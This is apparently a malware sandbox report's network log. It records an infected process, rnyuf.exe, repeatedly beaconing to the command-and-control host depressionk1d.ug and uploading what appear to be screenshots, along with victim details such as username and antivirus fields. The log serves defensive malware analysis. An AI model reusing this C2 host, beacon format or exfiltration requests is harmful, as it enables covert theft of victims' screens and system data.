                          Nov 12, 2021 22:23:36.621623993 CET5202OUTData Raw: 29 4c fc d9 c6 49 c9 eb f2 8a f7 b9 bf e1 22 f3 e4 f2 3f b2 fc 9d c7 66 ff 00 33 76 dc f1 9c 77 c5 79 3d cc ff 00 07 a7 27 cb d6 6e ed b3 ff 00 3c a2 9c e3 fe fa 8c d7 45 37 8d fe 16 cf 3c 93 4b a8 ee 92 46 2e c7 c8 ba 19 24 e4 ff 00 0d 71 62 64
                          Data Ascii: )LI"?f3vwy='n<E7<KF.$qbdt}GD)>yn7357_Mp|UC^;%yR&||*UiE5K`9^~i)4.u%H8 bp
                          Nov 12, 2021 22:23:36.621685982 CET5210OUTData Raw: 40 f9 fd d4 9e 8a 2b e6 80 6b d2 c0 fc 2c 75 3e 08 fc c5 3c 52 67 9a 42 79 a5 ae e3 01 c2 96 90 52 d3 10 51 9a 42 68 a2 e0 28 a5 ed 40 a2 98 80 f5 a7 af 4a 6d 2e 4d 34 26 3f 3c d1 4d 06 94 1c 9a 62 1d 47 4a 41 4b 4c 42 d0 29 05 2d 02 1c 29 45 36
                          Data Ascii: @+k,u><RgByRQBh(@Jm.M4&?<MbGJAKLB)-)E6%4P!iiE0Gd.ifXRx5H~iKM=(hCN(p4NUE-4t!4)D9S(D4hP4)<U"1NRLQK@
                          Nov 12, 2021 22:23:36.668430090 CET5246INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:36 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          75192.168.2.449859178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:36.640966892 CET5226OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:36.666223049 CET5246INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:36 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          76192.168.2.449860178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:36.807454109 CET5247OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:36.833304882 CET5247INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:36 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          77192.168.2.449861178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:36.964042902 CET5248OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:37.277503014 CET5358INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:36 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          78192.168.2.449862178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:37.136358976 CET5248OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:37.136476040 CET5249OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:37.136713982 CET5259OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:37.136862993 CET5261OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:23:37.159131050 CET5265OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:23:37.159164906 CET5270OUTData Raw: 7d 09 7c 37 64 c0 4c 62 b2 31 33 74 ce dd a3 35 e6 92 6a be 26 89 ee 12 6b fd 5d 1e db fd 7a bc b2 83 17 38 f9 b2 7e 5e 48 1c f7 35 9d 75 7f 79 7d b7 ed 77 73 dc 6c ce df 3a 42 fb 73 d7 19 fa 54 41 4d 38 b4 f4 45 4a 51 b3 d3 56 6b 26 b7 0b 7d f8
                          Data Ascii: }|7dLb13t5j&k]z8~^H5uy}wsl:BsTAM8EJQVk&}~5^U_TuG`k<"Y0[djXI$cauw>Iz}kv{=20i)Om5!erlyA7qo.C[c?#\|R^Y]
                          Nov 12, 2021 22:23:37.159182072 CET5275OUTData Raw: 4a 00 43 4c 27 34 e2 73 4d a4 c6 86 56 cf 86 7f e4 25 27 fd 71 3f cc 56 2d 6d 78 67 fe 42 52 7f d7 13 fc c5 6b 85 fe 34 4c b1 7f c1 91 d5 d6 ff 00 87 3c 21 a9 f8 96 4d d6 c8 23 b6 53 87 b8 93 ee 83 e8 3d 4d 65 e9 96 2f a9 ea 96 d6 48 42 99 a4 09
                          Data Ascii: JCL'4sMV%'q?V-mxgBRk4L<!M#S=Me/HBQ=uG1PimFU'j^7:Q=pXxUwek->uBHwh-$c>*%K+ l=1^Khh.Fz5Zu$(bi
                          Nov 12, 2021 22:23:37.159193039 CET5278OUTData Raw: 55 6d 3a 39 6d 6d 34 c3 76 3c 3b 2c e8 f7 b1 c1 e5 f9 a2 f8 a6 f6 33 7c 99 db f2 e5 bb 71 5c 6d dd e5 c5 fd c9 b8 b9 31 6f 20 28 58 a1 48 91 40 ec 11 00 55 1f 41 4f 1a 96 a2 b6 e6 d9 6e b1 01 b5 36 65 3c b5 ff 00 52 64 f3 4a e7 19 fb fc e7 af 6c
                          Data Ascii: Um:9mm4v<;,3|q\m1o (XH@UAOn6e<RdJl$heJZ.'<-'aU[*S,07EWu.~PskKm\y$/4I(6%f\tw7Vr[bi#@xl z-$Ke8K.#$dT
                          Nov 12, 2021 22:23:37.159198999 CET5280OUTData Raw: 7d a9 0a 66 a7 90 6a a1 9e d1 54 46 2a d3 68 b3 51 18 aa 5d 33 48 d5 33 4c 75 1b 47 c5 69 34 35 13 43 58 ca 99 b4 6a 99 6f 15 40 d1 d6 a3 c5 50 3c 55 cf 3a 67 44 2a 99 a5 71 4c 2b 57 9e 2a 81 d2 b0 94 2c 74 46 77 2a 91 4d c5 4e 56 98 56 b3 71 34
                          Data Ascii: }fjTF*hQ]3H3LuGi45CXjo@P<U:gD*qL+W*,tFw*MNVVq4R#HE&*lUc~)Q`JQI\@($2iZm.+"o7;0ROfT(%(p vi)(!L\PzR8\hC@cMa(sQN,Uzm]GCd@S*t+\
                          Nov 12, 2021 22:23:37.159209967 CET5287OUTData Raw: 06 8d be fa 03 52 e6 d0 29 eb a9 9d b6 8d 80 f6 ad 51 69 6f 2f dc 62 b4 36 95 2f 54 65 6a 9f 6d 1e a6 8a 32 7a a3 24 c0 08 a8 5e d3 22 b5 9a ce 68 fe fc 4d 51 f9 5e d5 4a a4 58 b9 e5 1d cc 29 6c fd ab 3e 7b 2f 6a eb 0d be e1 d2 a0 92 c7 23 ee 9a
                          Data Ascii: R)Qio/b6/Tejm2z$^"hMQ^JX)l>{/j#OFMLIMJtb]i8j:1Tek@,W$DfCt3 ?s)WEpAIo3o)kKXdPt-^6B=yyFxkfy
                          Nov 12, 2021 22:23:37.181446075 CET5290OUTData Raw: 9a 70 aa 44 b1 f4 52 52 d5 12 38 53 81 a6 0a 75 52 25 a2 50 78 a7 e6 a2 06 9c 0d 5a 64 34 48 0d 3c 1a 88 1e 69 cb 56 99 0d 13 03 4f 06 a1 14 fc d5 a6 66 d1 26 68 06 99 9a 50 6a ae 2b 12 06 a7 87 a8 41 a7 83 4d 32 5a 25 0f ef 4f 0f 50 03 4a 0d 51
                          Data Ascii: pDRR8SuR%PxZd4H<iVOf&hPj+AM2Z%OPJQ%!ETPjpErrMS;u#<zNJy^]67N*h+IlFf!Ua9T]H4k*zp)U4aD{STQ{8VHma=8/lNt.8
                          Nov 12, 2021 22:23:37.279055119 CET5358INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:37 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          79192.168.2.449863178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:37.419044971 CET5359OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:37.448461056 CET5360INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:37 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          8192.168.2.449789178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:11.300755024 CET1468OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:11.300961018 CET1468OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:11.301270962 CET1478OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:11.301553965 CET1481OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:23:11.323626041 CET1484OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:23:11.323682070 CET1492OUTData Raw: 7d 09 7c 37 64 c0 4c 62 b2 31 33 74 ce dd a3 35 e6 92 6a be 26 89 ee 12 6b fd 5d 1e db fd 7a bc b2 83 17 38 f9 b2 7e 5e 48 1c f7 35 9d 75 7f 79 7d b7 ed 77 73 dc 6c ce df 3a 42 fb 73 d7 19 fa 54 41 4d 38 b4 f4 45 4a 51 b3 d3 56 6b 26 b7 0b 7d f8
                          Data Ascii: }|7dLb13t5j&k]z8~^H5uy}wsl:BsTAM8EJQVk&}~5^U_TuG`k<"Y0[djXI$cauw>Iz}kv{=20i)Om5!erlyA7qo.C[c?#\|R^Y]
                          Nov 12, 2021 22:23:11.323781967 CET1495OUTData Raw: 8a 5a 5c 53 24 4c 52 81 4a 05 2e 29 89 b1 b4 62 9f 8a 31 45 85 71 98 a5 c5 3b 14 b8 a7 60 b8 dc 51 b6 9f 8a 5c 53 b0 ae 33 6d 1b 6a 4d b4 6d a7 61 73 11 ed a3 6d 4b 8a 36 d1 ca 1c c4 3b 28 2b 53 ed a4 db 4f 94 39 88 0a d3 4a d5 82 b4 85 2a 79 46
                          Data Ascii: Z\S$LRJ.)b1Eq;`Q\S3mjMmasmK6;(+SO9J*yFV+M)VJJTVI)HVV+L)RZ9ZiiSL"""RM"&0LSIRUE!PwE!Ph7CJ*|lx_BJ:5i1|xss7RM
                          Nov 12, 2021 22:23:11.323827982 CET1501OUTData Raw: 55 6d 3a 39 6d 6d 34 c3 76 3c 3b 2c e8 f7 b1 c1 e5 f9 a2 f8 a6 f6 33 7c 99 db f2 e5 bb 71 5c 6d dd e5 c5 fd c9 b8 b9 31 6f 20 28 58 a1 48 91 40 ec 11 00 55 1f 41 4f 1a 96 a2 b6 e6 d9 6e b1 01 b5 36 65 3c b5 ff 00 52 64 f3 4a e7 19 fb fc e7 af 6c
                          Data Ascii: Um:9mm4v<;,3|q\m1o (XH@UAOn6e<RdJl$heJZ.'<-'aU[*S,07EWu.~PskKm\y$/4I(6%f\tw7Vr[bi#@xl z-$Ke8K.#$dT
                          Nov 12, 2021 22:23:11.323873997 CET1504OUTData Raw: e4 77 a7 cd 17 ba 17 2c 96 cc b2 74 b8 4f 47 a6 9d 20 ff 00 0b d3 04 cc 3b d3 d6 e1 c7 43 4e d4 df 41 5e aa ea 44 74 a9 87 4c 1a 89 b4 fb 85 3f 70 d5 f1 76 e3 bd 4a 97 8d de 8f 67 49 ec 1e d6 aa 32 4d ac c3 f8 0f e5 4d 31 38 ea a6 b7 85 da 9e ab
                          Data Ascii: w,tOG ;CNA^DtL?pvJgI2MM18NobvZ?-4Z?A_V}}j=Qvm*[?%')biHm&QQ:u)}JXV>~T)F1Shaq8p+IpH%:S AO
                          Nov 12, 2021 22:23:11.323915958 CET1507OUTData Raw: 8c 52 f9 c3 f8 51 45 17 64 ba 9e 45 41 1c a7 a2 13 f8 54 8b 6f 31 fe 1c 7d 6a 73 33 f6 c0 a6 99 1f fb c6 8d 49 e7 6c 05 ab 77 75 1f 8d 3c 5b a0 eb 27 e5 51 ee 3e b4 80 d3 b3 25 dd 96 36 40 a7 ef 13 4e df 0a f4 50 6a b6 68 a3 90 9b 16 85 d0 1f 75
                          Data Ascii: RQEdEATo1}js3Ilwu<['Q>%6@NPjhuU\^#,{~`4#7V'QG${*5<_[W/V.>Cd;1^!gGF=nl5}NPF;m)hV(\$|.<oZO7Z$dW
                          Nov 12, 2021 22:23:11.346317053 CET1515OUTData Raw: 9a 70 aa 44 b1 f4 52 52 d5 12 38 53 81 a6 0a 75 52 25 a2 50 78 a7 e6 a2 06 9c 0d 5a 64 34 48 0d 3c 1a 88 1e 69 cb 56 99 0d 13 03 4f 06 a1 14 fc d5 a6 66 d1 26 68 06 99 9a 50 6a ae 2b 12 06 a7 87 a8 41 a7 83 4d 32 5a 25 0f ef 4f 0f 50 03 4a 0d 51
                          Data Ascii: pDRR8SuR%PxZd4H<iVOf&hPj+AM2Z%OPJQ%!ETPjpErrMS;u#<zNJy^]67N*h+IlFf!Ua9T]H4k*zp)U4aD{STQ{8VHma=8/lNt.8
                          Nov 12, 2021 22:23:11.446185112 CET1578INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:11 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          80192.168.2.449864178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:37.589437962 CET5360OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:37.617027998 CET5361INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:37 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0
                          Nov 12, 2021 22:23:37.712647915 CET5361OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:37.712874889 CET5361OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:37.713076115 CET5371OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:37.713171005 CET5374OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:23:37.735601902 CET5379OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:23:37.735745907 CET5395OUTData Raw: e7 4f bf 96 7d 42 39 a5 2b 69 2e c9 54 40 01 62 30 14 2f 0d 97 3b b3 9c 0a e7 fc 1d a5 6a 53 2a eb 76 d6 5a 8d f4 5a 6d cc 52 25 ad 94 2d 23 4b 38 cb 26 ed a0 ed 51 b7 96 eb c8 03 ae 47 2e 61 43 da 94 c6 a7 1c 74 aa f6 52 bb 77 df fc ee 43 a9 17
                          Data Ascii: O}B9+i.T@b0/;jS*vZZmR%-#K8&QG.aCtRwCechMw+>y_o\sS5_od.+,i;xQsqRqk^_/6Gc[?rXciNr9,8bH*SqRR;4fb
                          Nov 12, 2021 22:23:37.735774040 CET5401OUTData Raw: 1d c8 50 67 31 ec 90 15 65 23 95 c0 3f 74 0e 46 7d eb 95 8f 52 bf 8a dd ed e3 bd b9 48 5d 76 bc 6b 2b 05 61 e8 46 70 45 74 47 0d 2b dd b2 25 88 8d ac 91 56 92 8a 2b b4 e4 14 51 45 14 c0 2b e9 3f 83 cc bf f0 85 6d c8 dc 26 04 8f 63 1a 7f 81 af 9b
                          Data Ascii: Pg1e#?tF}RH]vk+aFpEtG+%V+QE+?m&c+oK>\Xr;+c*G:5)vRK[_f}+/5KHlb}(z9rZa{6>(Ucw5<OAK')uU+/ts`
                          Nov 12, 2021 22:23:37.758258104 CET5417OUTData Raw: 83 14 62 81 45 30 b8 53 85 36 94 1a 04 28 eb 4e 1d e9 b4 b4 d0 85 a2 8a 5a 64 8b 8a 4c 52 81 4a 06 29 d8 06 e2 8a 53 49 40 20 a2 92 8a 40 14 b4 52 1a 00 5a 51 40 a2 98 0b 4b 49 4a 29 88 5a 33 49 45 08 43 b3 40 eb 40 a3 35 40 3a 8a 6e 68 14 13 61
                          Data Ascii: bE0S6(NZdLRJ)SI@ @RZQ@KIJ)Z3IEC@@5@:nhaii(0RRZJZhLS@C:)BSiEQ,uQNuQ#<*1OH<RMU:uM~itj-f8dvjM3N8h<8isLlJ8Pi.h0Pib@iA
                          Nov 12, 2021 22:23:37.758302927 CET5428OUTData Raw: 31 7d 6a 99 8a 31 4e 18 ad 91 a4 47 ea 69 46 93 10 ee 69 fd 5e 64 bc 55 33 1b 8a 38 ad bf ec 98 fd 4d 28 d2 62 f5 34 fe af 31 7d 6a 99 89 c5 2e 05 6d 8d 26 2f 53 4e 1a 4c 5e f4 fe af 22 5e 2a 99 89 8a 36 d6 e7 f6 54 5e f4 bf d9 51 7b d5 7d 5e 42
                          Data Ascii: 1}j1NGiFi^dU38M(b41}j.m&/SNL^"^*6T^Q{}^B3m(Z4W?Z/#X]~{yGw>ovZ)3:j1X3/y,0814k/&u!VKte,m5oCKJ)gCUe}
                          Nov 12, 2021 22:23:37.758366108 CET5443OUTData Raw: 2b c0 6b dd be 03 de 5a da 78 7f 56 fb 4d cc 30 ee ba 5d be 6c 81 73 84 e7 19 ac 2b fc 06 b4 7e 23 9f ff 00 84 73 5c ff 00 a0 2e a3 ff 00 80 af fe 14 a3 c3 ba ea b0 61 a3 ea 40 83 90 45 ab f1 fa 57 bb ff 00 6c 69 9f f4 12 b3 ff 00 c0 84 ff 00 1a
